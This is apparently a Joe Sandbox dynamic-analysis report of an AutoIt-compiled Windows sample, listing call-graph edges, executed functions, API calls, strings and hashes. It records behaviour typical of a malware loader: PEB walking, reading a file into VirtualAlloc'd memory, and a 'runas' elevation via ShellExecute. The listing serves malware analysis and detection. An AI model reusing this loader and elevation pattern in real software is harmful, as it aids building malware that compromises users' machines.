97856->97753 97857->97758 97858->97766 97859->97777 97860->97853 97861 5d3156 97864 5d3170 97861->97864 97865 5d3187 97864->97865 97866 5d318c 97865->97866 97867 5d31eb 97865->97867 97902 5d31e9 97865->97902 97868 5d3199 97866->97868 97869 5d3265 PostQuitMessage 97866->97869 97871 612dfb 97867->97871 97872 5d31f1 97867->97872 97874 5d31a4 97868->97874 97875 612e7c 97868->97875 97906 5d316a 97869->97906 97870 5d31d0 DefWindowProcW 97870->97906 97920 5d18e2 10 API calls 97871->97920 97876 5d321d SetTimer RegisterWindowMessageW 97872->97876 97877 5d31f8 97872->97877 97879 5d31ae 97874->97879 97880 612e68 97874->97880 97924 63bf30 34 API calls ___scrt_fastfail 97875->97924 97881 5d3246 CreatePopupMenu 97876->97881 97876->97906 97883 5d3201 KillTimer 97877->97883 97884 612d9c 97877->97884 97878 612e1c 97921 5ee499 42 API calls 97878->97921 97888 5d31b9 97879->97888 97896 612e4d 97879->97896 97909 63c161 97880->97909 97881->97906 97916 5d30f2 Shell_NotifyIconW ___scrt_fastfail 97883->97916 97890 612da1 97884->97890 97891 612dd7 MoveWindow 97884->97891 97893 5d3253 97888->97893 97900 5d31c4 97888->97900 97889 612e8e 97889->97870 97889->97906 97894 612da7 97890->97894 97895 612dc6 SetFocus 97890->97895 97891->97906 97892 5d3214 97917 5d3c50 DeleteObject DestroyWindow 97892->97917 97918 5d326f 44 API calls ___scrt_fastfail 97893->97918 97894->97900 97901 612db0 97894->97901 97895->97906 97896->97870 97923 630ad7 22 API calls 97896->97923 97900->97870 97922 5d30f2 Shell_NotifyIconW ___scrt_fastfail 97900->97922 97919 5d18e2 10 API calls 97901->97919 97902->97870 97903 5d3263 97903->97906 97907 612e41 97908 5d3837 49 API calls 97907->97908 97908->97902 97910 63c276 97909->97910 97911 63c179 ___scrt_fastfail 97909->97911 97910->97906 97912 5d3923 24 API calls 97911->97912 97914 63c1a0 97912->97914 97913 63c25f KillTimer SetTimer 97913->97910 97914->97913 97915 63c251 Shell_NotifyIconW 97914->97915 97915->97913 97916->97892 97917->97906 97918->97903 97919->97906 97920->97878 97921->97900 97922->97907 97923->97902 97924->97889 97925 5d1033 97930 5d4c91 97925->97930 97929 5d1042 97931 5da961 22 API calls 97930->97931 97932 5d4cff 97931->97932 97938 5d3af0 97932->97938 97934 5d4d9c 97936 5d1038 97934->97936 97941 5d51f7 22 API calls __fread_nolock 97934->97941 97937 5f00a3 29 API calls __onexit 97936->97937 97937->97929 97942 5d3b1c 97938->97942 97941->97934 97943 5d3b0f 97942->97943 97944 5d3b29 97942->97944 97943->97934 97944->97943 97945 5d3b30 RegOpenKeyExW 97944->97945 97945->97943 97946 5d3b4a RegQueryValueExW 97945->97946 97947 5d3b6b 97946->97947 97948 5d3b80 RegCloseKey 97946->97948 97947->97948 97948->97943 97949 1a6a348 97963 1a67f98 97949->97963 97951 1a6a447 97966 1a6a238 97951->97966 97953 1a6a470 CreateFileW 97955 1a6a4c7 97953->97955 97956 1a6a4c2 97953->97956 97955->97956 97957 1a6a4de VirtualAlloc 97955->97957 97957->97956 97958 1a6a4fc ReadFile 97957->97958 97958->97956 97959 1a6a517 97958->97959 97960 1a69238 13 API calls 97959->97960 97961 1a6a54a 97960->97961 97962 1a6a56d ExitProcess 97961->97962 97962->97956 97969 1a6b478 GetPEB 97963->97969 97965 1a68623 97965->97951 97967 1a6a241 Sleep 97966->97967 97968 1a6a24f 97967->97968 97970 1a6b4a2 97969->97970 97970->97965 97971 5d1cad SystemParametersInfoW 97972 1a6a8f3 97973 1a6a8f8 97972->97973 97974 1a67f98 GetPEB 97973->97974 97975 1a6a904 97974->97975 97976 1a6a922 97975->97976 97977 1a6a9b8 97975->97977 97981 1a6a5c8 97976->97981 97994 1a6b268 9 API calls 97977->97994 97980 1a6a99f 97982 1a67f98 GetPEB 97981->97982 97983 1a6a667 97982->97983 97986 1a6a6c1 VirtualAlloc 97983->97986 97988 1a6a6a5 97983->97988 97992 1a6a7c8 CloseHandle 97983->97992 97993 1a6a7d8 VirtualFree 97983->97993 97995 1a6b4d8 GetPEB 97983->97995 97985 1a6a698 CreateFileW 97985->97983 97985->97988 97987 1a6a6e2 ReadFile 97986->97987 97986->97988 97987->97988 97989 1a6a700 VirtualAlloc 97987->97989 97990 1a6a8b4 VirtualFree 97988->97990 97991 1a6a8c2 97988->97991 97989->97983 97989->97988 97990->97991 97991->97980 97992->97983 97993->97983 97994->97980 97996 1a6b502 97995->97996 97996->97985 97997 623f75 98008 5eceb1 97997->98008 97999 623f8b 98007 624006 97999->98007 98017 5ee300 23 API calls 97999->98017 98001 5dbf40 235 API calls 98003 624052 98001->98003 98005 624a88 98003->98005 98019 64359c 82 API calls __wsopen_s 98003->98019 98004 623fe6 98004->98003 98018 641abf 22 API calls 98004->98018 98007->98001 98009 5ecebf 98008->98009 98010 5eced2 98008->98010 98011 5daceb 23 API calls 98009->98011 98012 5eced7 98010->98012 98013 5ecf05 98010->98013 98016 5ecec9 98011->98016 98015 5efddb 22 API calls 98012->98015 98014 5daceb 23 API calls 98013->98014 98014->98016 98015->98016 98016->97999 98017->98004 98018->98007 98019->98005 98020 5d1044 98025 5d10f3 98020->98025 98022 5d104a 98061 5f00a3 29 API calls __onexit 98022->98061 98024 5d1054 98062 5d1398 98025->98062 98029 5d116a 98030 5da961 22 API calls 98029->98030 98031 5d1174 98030->98031 98032 5da961 22 API calls 98031->98032 98033 5d117e 98032->98033 98034 5da961 22 API calls 98033->98034 98035 5d1188 98034->98035 98036 5da961 22 API calls 98035->98036 98037 5d11c6 98036->98037 98038 5da961 22 API calls 98037->98038 98039 5d1292 98038->98039 98072 5d171c 98039->98072 98043 5d12c4 98044 5da961 22 API calls 98043->98044 98045 5d12ce 98044->98045 98046 5e1940 9 API calls 98045->98046 98047 5d12f9 98046->98047 98093 5d1aab 98047->98093 98049 5d1315 98050 5d1325 GetStdHandle 98049->98050 98051 612485 98050->98051 98052 5d137a 98050->98052 98051->98052 98053 61248e 98051->98053 98055 5d1387 OleInitialize 98052->98055 98054 5efddb 22 API calls 98053->98054 98056 612495 98054->98056 98055->98022 98100 64011d InitializeCriticalSectionAndSpinCount InterlockedExchange GetCurrentProcess GetCurrentProcess DuplicateHandle 98056->98100 98058 61249e 98101 640944 CreateThread 98058->98101 98060 6124aa CloseHandle 98060->98052 98061->98024 98102 5d13f1 98062->98102 98065 5d13f1 22 API calls 98066 5d13d0 98065->98066 98067 5da961 22 API calls 98066->98067 98068 5d13dc 98067->98068 98069 5d6b57 22 API calls 98068->98069 98070 5d1129 98069->98070 98071 5d1bc3 6 API calls 98070->98071 98071->98029 98073 5da961 22 API calls 98072->98073 98074 5d172c 98073->98074 98075 5da961 22 API calls 98074->98075 98076 5d1734 98075->98076 98077 5da961 22 API calls 98076->98077 98078 5d174f 98077->98078 98079 5efddb 22 API calls 98078->98079 98080 5d129c 98079->98080 98081 5d1b4a 98080->98081 98082 5d1b58 98081->98082 98083 5da961 22 API calls 98082->98083 98084 5d1b63 98083->98084 98085 5da961 22 API calls 98084->98085 98086 5d1b6e 98085->98086 98087 5da961 22 API calls 98086->98087 98088 5d1b79 98087->98088 98089 5da961 22 API calls 98088->98089 98090 5d1b84 98089->98090 98091 5efddb 22 API calls 98090->98091 98092 5d1b96 RegisterWindowMessageW 98091->98092 98092->98043 98094 5d1abb 98093->98094 98095 61272d 98093->98095 98096 5efddb 22 API calls 98094->98096 98109 643209 23 API calls 98095->98109 98098 5d1ac3 98096->98098 98098->98049 98099 612738 98100->98058 98101->98060 98110 64092a 28 API calls 98101->98110 98103 5da961 22 API calls 98102->98103 98104 5d13fc 98103->98104 98105 5da961 22 API calls 98104->98105 98106 5d1404 98105->98106 98107 5da961 22 API calls 98106->98107 98108 5d13c6 98107->98108 98108->98065 98109->98099 98111 5d6a26 98112 5efddb 22 API calls 98111->98112 98113 5d6a33 98112->98113 98114 5d2de3 98115 5d2df0 __wsopen_s 98114->98115 98116 5d2e09 98115->98116 98117 612c2b ___scrt_fastfail 98115->98117 98118 5d3aa2 23 API calls 98116->98118 98119 612c47 GetOpenFileNameW 98117->98119 98120 5d2e12 98118->98120 98121 612c96 98119->98121 98130 5d2da5 98120->98130 98123 5d6b57 22 API calls 98121->98123 98125 612cab 98123->98125 98125->98125 98127 5d2e27 98148 5d44a8 98127->98148 98131 611f50 __wsopen_s 98130->98131 98132 5d2db2 GetLongPathNameW 98131->98132 98133 5d6b57 22 API calls 98132->98133 98134 5d2dda 98133->98134 98135 5d3598 98134->98135 98136 5da961 22 API calls 98135->98136 98137 5d35aa 98136->98137 98138 5d3aa2 23 API calls 98137->98138 98139 5d35b5 98138->98139 98140 5d35c0 98139->98140 98145 6132eb 98139->98145 98141 5d515f 22 API calls 98140->98141 98143 5d35cc 98141->98143 98178 5d35f3 98143->98178 98144 61330d 98145->98144 98184 5ece60 41 API calls 98145->98184 98147 5d35df 98147->98127 98149 5d4ecb 94 API calls 98148->98149 98150 5d44cd 98149->98150 98151 613833 98150->98151 98153 5d4ecb 94 API calls 98150->98153 98152 642cf9 80 API calls 98151->98152 98154 613848 98152->98154 98155 5d44e1 98153->98155 98156 613869 98154->98156 98157 61384c 98154->98157 98155->98151 98158 5d44e9 98155->98158 98160 5efe0b 22 API calls 98156->98160 98159 5d4f39 68 API calls 98157->98159 98161 613854 98158->98161 98162 5d44f5 98158->98162 98159->98161 98177 6138ae 98160->98177 98186 63da5a 82 API calls 98161->98186 98185 5d940c 136 API calls 2 library calls 98162->98185 98165 5d2e31 98166 613862 98166->98156 98167 613a5f 98172 613a67 98167->98172 98168 5d4f39 68 API calls 98168->98172 98169 5da4a1 22 API calls 98169->98177 98172->98168 98191 63989b 82 API calls __wsopen_s 98172->98191 98174 5d9cb3 22 API calls 98174->98177 98177->98167 98177->98169 98177->98172 98177->98174 98187 63967e 22 API calls __fread_nolock 98177->98187 98188 6395ad 42 API calls _wcslen 98177->98188 98189 640b5a 22 API calls 98177->98189 98190 5d3ff7 22 API calls 98177->98190 98179 5d3605 98178->98179 98183 5d3624 __fread_nolock 98178->98183 98181 5efe0b 22 API calls 98179->98181 98180 5efddb 22 API calls 98182 5d363b 98180->98182 98181->98183 98182->98147 98183->98180 98184->98145 98185->98165 98186->98166 98187->98177 98188->98177 98189->98177 98190->98177 98191->98172

                                                                                Executed Functions

                                                                                Function 005D42DE Relevance: 21.2, APIs: 9, Strings: 3, Instructions: 235libraryloaderCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 234 5d42de-5d434d call 5da961 GetVersionExW call 5d6b57 239 613617-61362a 234->239 240 5d4353 234->240 241 61362b-61362f 239->241 242 5d4355-5d4357 240->242 245 613631 241->245 246 613632-61363e 241->246 243 5d435d-5d43bc call 5d93b2 call 5d37a0 242->243 244 613656 242->244 262 6137df-6137e6 243->262 263 5d43c2-5d43c4 243->263 249 61365d-613660 244->249 245->246 246->241 248 613640-613642 246->248 248->242 251 613648-61364f 248->251 252 5d441b-5d4435 GetCurrentProcess IsWow64Process 249->252 253 613666-6136a8 249->253 251->239 255 613651 251->255 258 5d4494-5d449a 252->258 259 5d4437 252->259 253->252 256 6136ae-6136b1 253->256 255->244 260 6136b3-6136bd 256->260 261 6136db-6136e5 256->261 264 5d443d-5d4449 258->264 259->264 265 6136ca-6136d6 260->265 266 6136bf-6136c5 260->266 268 6136e7-6136f3 261->268 269 6136f8-613702 261->269 270 613806-613809 262->270 271 6137e8 262->271 263->249 267 5d43ca-5d43dd 263->267 272 5d444f-5d445e LoadLibraryA 264->272 273 613824-613828 GetSystemInfo 264->273 265->252 266->252 274 613726-61372f 267->274 275 5d43e3-5d43e5 267->275 268->252 277 613715-613721 269->277 278 613704-613710 269->278 279 6137f4-6137fc 270->279 280 61380b-61381a 270->280 276 6137ee 271->276 281 5d449c-5d44a6 GetSystemInfo 272->281 282 5d4460-5d446e GetProcAddress 272->282 287 613731-613737 274->287 288 61373c-613748 274->288 285 5d43eb-5d43ee 275->285 286 61374d-613762 275->286 276->279 277->252 278->252 279->270 280->276 289 61381c-613822 280->289 284 5d4476-5d4478 281->284 282->281 283 5d4470-5d4474 GetNativeSystemInfo 282->283 283->284 290 5d447a-5d447b FreeLibrary 284->290 291 5d4481-5d4493 284->291 292 613791-613794 285->292 293 5d43f4-5d440f 285->293 294 613764-61376a 286->294 295 61376f-61377b 286->295 287->252 288->252 289->279 290->291 292->252 296 61379a-6137c1 292->296 297 613780-61378c 293->297 298 5d4415 293->298 294->252 295->252 299 6137c3-6137c9 296->299 300 6137ce-6137da 296->300 297->252 298->252 299->252 300->252
                                                                                APIs
                                                                                • GetVersionExW.KERNEL32(?), ref: 005D430D
                                                                                  • Part of subcall function 005D6B57: _wcslen.LIBCMT ref: 005D6B6A
                                                                                • GetCurrentProcess.KERNEL32(?,0066CB64,00000000,?,?), ref: 005D4422
                                                                                • IsWow64Process.KERNEL32(00000000,?,?), ref: 005D4429
                                                                                • LoadLibraryA.KERNEL32(kernel32.dll,?,?), ref: 005D4454
                                                                                • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 005D4466
                                                                                • GetNativeSystemInfo.KERNELBASE(?,?,?), ref: 005D4474
                                                                                • FreeLibrary.KERNEL32(00000000,?,?), ref: 005D447B
                                                                                • GetSystemInfo.KERNEL32(?,?,?), ref: 005D44A0
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: InfoLibraryProcessSystem$AddressCurrentFreeLoadNativeProcVersionWow64_wcslen
                                                                                • String ID: GetNativeSystemInfo$kernel32.dll$|O
                                                                                • API String ID: 3290436268-3101561225
                                                                                • Opcode ID: c7dfaecc9cbb2905997f6da12a6d14750935640c66cee1fe0572f76e40fb8831
                                                                                • Instruction ID: 59e376a22e45d12bb2042e10b5a884806188669c55b1463747b93ac5f6100ced
                                                                                • Opcode Fuzzy Hash: c7dfaecc9cbb2905997f6da12a6d14750935640c66cee1fe0572f76e40fb8831
                                                                                • Instruction Fuzzy Hash: 3BA1916190A6E0DFCF21EF6D78401E57FE77B27340F08689AD0819BB62D6706988CF65
                                                                                Function 005D42A2 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 1063 5d42a2-5d42ba CreateStreamOnHGlobal 1064 5d42bc-5d42d3 FindResourceExW 1063->1064 1065 5d42da-5d42dd 1063->1065 1066 5d42d9 1064->1066 1067 6135ba-6135c9 LoadResource 1064->1067 1066->1065 1067->1066 1068 6135cf-6135dd SizeofResource 1067->1068 1068->1066 1069 6135e3-6135ee LockResource 1068->1069 1069->1066 1070 6135f4-613612 1069->1070 1070->1066
                                                                                APIs
                                                                                • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?,?,?,?,?,005D50AA,?,?,00000000,00000000), ref: 005D42B2
                                                                                • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,005D50AA,?,?,00000000,00000000), ref: 005D42C9
                                                                                • LoadResource.KERNEL32(?,00000000,?,?,005D50AA,?,?,00000000,00000000,?,?,?,?,?,?,005D4F20), ref: 006135BE
                                                                                • SizeofResource.KERNEL32(?,00000000,?,?,005D50AA,?,?,00000000,00000000,?,?,?,?,?,?,005D4F20), ref: 006135D3
                                                                                • LockResource.KERNEL32(005D50AA,?,?,005D50AA,?,?,00000000,00000000,?,?,?,?,?,?,005D4F20,?), ref: 006135E6
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                                                • String ID: SCRIPT
                                                                                • API String ID: 3051347437-3967369404
                                                                                • Opcode ID: 998065ab5100cd6b988080ae65b8f6734b4b03592624ed03ca2f06c92038cd5d
                                                                                • Instruction ID: cf69c9c1d30a5f3a7f3755b631b35847fe8ea26174c0ffc0e82e80015da85a54
                                                                                • Opcode Fuzzy Hash: 998065ab5100cd6b988080ae65b8f6734b4b03592624ed03ca2f06c92038cd5d
                                                                                • Instruction Fuzzy Hash: 10117C74200B01BFE7218B69DC48F677BBEEBC5B61F14816AF846D6350DBB1DD009A60
                                                                                Function 00612BA5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 005D2B6B
                                                                                  • Part of subcall function 005D3A5A: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,006A1418,?,005D2E7F,?,?,?,00000000), ref: 005D3A78
                                                                                  • Part of subcall function 005D9CB3: _wcslen.LIBCMT ref: 005D9CBD
                                                                                • GetForegroundWindow.USER32(runas,?,?,?,?,?,00692224), ref: 00612C10
                                                                                • ShellExecuteW.SHELL32(00000000,?,?,00692224), ref: 00612C17
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: CurrentDirectoryExecuteFileForegroundModuleNameShellWindow_wcslen
                                                                                • String ID: runas
                                                                                • API String ID: 448630720-4000483414
                                                                                • Opcode ID: 189409e358737b074a01509bbba4c049d835b039a40dc5bea046ea855fdd37ee
                                                                                • Instruction ID: cb875cb172d9e19fe290f6770fb4bfba21fe9c8a4362b903275e3cae874b4569
                                                                                • Opcode Fuzzy Hash: 189409e358737b074a01509bbba4c049d835b039a40dc5bea046ea855fdd37ee
                                                                                • Instruction Fuzzy Hash: 5A11BB312083435AD724FF6CD8599BE7FA6BBE6750F04141FF082562A2CF61494AD713
                                                                                Function 0063DBBE Relevance: 6.0, APIs: 4, Instructions: 29filestringCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • lstrlenW.KERNEL32(?,00615222), ref: 0063DBCE
                                                                                • GetFileAttributesW.KERNELBASE(?), ref: 0063DBDD
                                                                                • FindFirstFileW.KERNELBASE(?,?), ref: 0063DBEE
                                                                                • FindClose.KERNEL32(00000000), ref: 0063DBFA
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: FileFind$AttributesCloseFirstlstrlen
                                                                                • String ID:
                                                                                • API String ID: 2695905019-0
                                                                                • Opcode ID: d4fec68f29f840d69fe43d771d3d2f4d3f0bf3cbd1e05bf4cb0bdca0bcc483b2
                                                                                • Instruction ID: 7b3aa2fbe15a827ac916c31ff358473973d5170cb4871a479b8ab476f50efd50
                                                                                • Opcode Fuzzy Hash: d4fec68f29f840d69fe43d771d3d2f4d3f0bf3cbd1e05bf4cb0bdca0bcc483b2
                                                                                • Instruction Fuzzy Hash: 34F0A0B082091057C3206B78AC0D8BA776E9F02374F106702F8B6C22E0EBF09A5586D5
                                                                                Function 005DBF40 Relevance: 2.4, Strings: 1, Instructions: 1178COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: BuffCharUpper
                                                                                • String ID: p#j
                                                                                • API String ID: 3964851224-3095285349
                                                                                • Opcode ID: 33c7693b29437a2a7a095b53f41e4040a002aaacbd722d7913f8708b79d0b857
                                                                                • Instruction ID: 15c520fef14d4c32bad02094485376768aaec2d03d5559e8c2e4fc79d45adf46
                                                                                • Opcode Fuzzy Hash: 33c7693b29437a2a7a095b53f41e4040a002aaacbd722d7913f8708b79d0b857
                                                                                • Instruction Fuzzy Hash: D3A258706083529FD724DF18C484B6ABBE1BF89304F14896EE89A9B352D771EC45CF92
                                                                                Function 005DD730 Relevance: 21.6, APIs: 14, Instructions: 627windowsleeptimeCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetInputState.USER32 ref: 005DD807
                                                                                • timeGetTime.WINMM ref: 005DDA07
                                                                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 005DDB28
                                                                                • TranslateMessage.USER32(?), ref: 005DDB7B
                                                                                • DispatchMessageW.USER32(?), ref: 005DDB89
                                                                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 005DDB9F
                                                                                • Sleep.KERNEL32(0000000A), ref: 005DDBB1
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: Message$Peek$DispatchInputSleepStateTimeTranslatetime
                                                                                • String ID:
                                                                                • API String ID: 2189390790-0
                                                                                • Opcode ID: 574f17a45401ee83bfdd4ca7ada0ec7b3bc34910656d1c632640e4b407c75e85
                                                                                • Instruction ID: cb00c8c3d07955d792f0f0418e8f699ba810535bba048e4c0c64d7e2ed234a13
                                                                                • Opcode Fuzzy Hash: 574f17a45401ee83bfdd4ca7ada0ec7b3bc34910656d1c632640e4b407c75e85
                                                                                • Instruction Fuzzy Hash: 9C42C330608642EFD734DF28D854BAABBB2BF46314F14855BE4958B391D771E844CFA2
                                                                                Function 005D2CD4 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 53windowregistryCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • GetSysColorBrush.USER32(0000000F), ref: 005D2D07
                                                                                • RegisterClassExW.USER32(00000030), ref: 005D2D31
                                                                                • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 005D2D42
                                                                                • InitCommonControlsEx.COMCTL32(?), ref: 005D2D5F
                                                                                • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 005D2D6F
                                                                                • LoadIconW.USER32(000000A9), ref: 005D2D85
                                                                                • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 005D2D94
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                                • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                                • API String ID: 2914291525-1005189915
                                                                                • Opcode ID: 121b6a6a6e8762139e365b1bc254bcaefe27fb6114374e8c543223a2f51bdb62
                                                                                • Instruction ID: 6e47a437f9c65f56e95d4876de84832cf65a562f6e3e7fc1d11d957aa11f6066
                                                                                • Opcode Fuzzy Hash: 121b6a6a6e8762139e365b1bc254bcaefe27fb6114374e8c543223a2f51bdb62
                                                                                • Instruction Fuzzy Hash: B521E3B5901318AFDB00EFA4E849BEEBFB6FB0A721F00511AF551AA2A0D7B11544CF91
                                                                                Function 0061065B Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 272COMMONLIBRARYCODE
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 302 61065b-61068b call 61042f 305 6106a6-6106b2 call 605221 302->305 306 61068d-610698 call 5ff2c6 302->306 312 6106b4-6106c9 call 5ff2c6 call 5ff2d9 305->312 313 6106cb-610714 call 61039a 305->313 311 61069a-6106a1 call 5ff2d9 306->311 323 61097d-610983 311->323 312->311 321 610781-61078a GetFileType 313->321 322 610716-61071f 313->322 327 6107d3-6107d6 321->327 328 61078c-6107bd GetLastError call 5ff2a3 CloseHandle 321->328 325 610721-610725 322->325 326 610756-61077c GetLastError call 5ff2a3 322->326 325->326 331 610727-610754 call 61039a 325->331 326->311 329 6107d8-6107dd 327->329 330 6107df-6107e5 327->330 328->311 339 6107c3-6107ce call 5ff2d9 328->339 335 6107e9-610837 call 60516a 329->335 330->335 336 6107e7 330->336 331->321 331->326 345 610847-61086b call 61014d 335->345 346 610839-610845 call 6105ab 335->346 336->335 339->311 351 61086d 345->351 352 61087e-6108c1 345->352 346->345 353 61086f-610879 call 6086ae 346->353 351->353 355 6108c3-6108c7 352->355 356 6108e2-6108f0 352->356 353->323 355->356 358 6108c9-6108dd 355->358 359 6108f6-6108fa 356->359 360 61097b 356->360 358->356 359->360 361 6108fc-61092f CloseHandle call 61039a 359->361 360->323 364 610931-61095d GetLastError call 5ff2a3 call 605333 361->364 365 610963-610977 361->365 364->365 365->360
                                                                                APIs
